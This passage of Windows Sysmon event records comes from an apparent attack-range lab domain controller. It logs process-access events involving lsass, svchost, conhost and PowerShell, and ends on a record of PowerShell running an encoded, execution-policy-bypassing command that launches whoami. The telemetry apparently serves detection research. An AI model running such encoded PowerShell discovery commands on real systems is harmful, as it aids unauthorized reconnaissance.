{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2724,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-1090-5F25-0000-001046CB0400}\r\nSourceProcessId: 4832\r\nSourceThreadId: 4852\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-1090-5F25-0000-001046CB0400}","SourceProcessId":"4832","SourceThreadId":"4852","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2725,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.427\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.427","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2726,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.443\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.443","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2727,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.443\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.443","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2728,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2729,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.458\r\nProcessGuid: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nProcessId: 4908\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yxicdx2b.fk1.ps1\r\nCreationUtcTime: 2020-08-01 06:49:52.458","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.458","ProcessGuid":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yxicdx2b.fk1.ps1","CreationUtcTime":"2020-08-01 06:49:52.458","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2730,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.490\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.490","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2731,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.490\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.490","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2732,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nProcessGuid: {E2A3D6B1-1090-5F25-0000-001022DB0400}\r\nProcessId: 5004\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-1090-5F25-0000-002096CA0400}\r\nLogonId: 0x4CA96\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nParentProcessId: 4908\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","ProcessGuid":"{E2A3D6B1-1090-5F25-0000-001022DB0400}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft 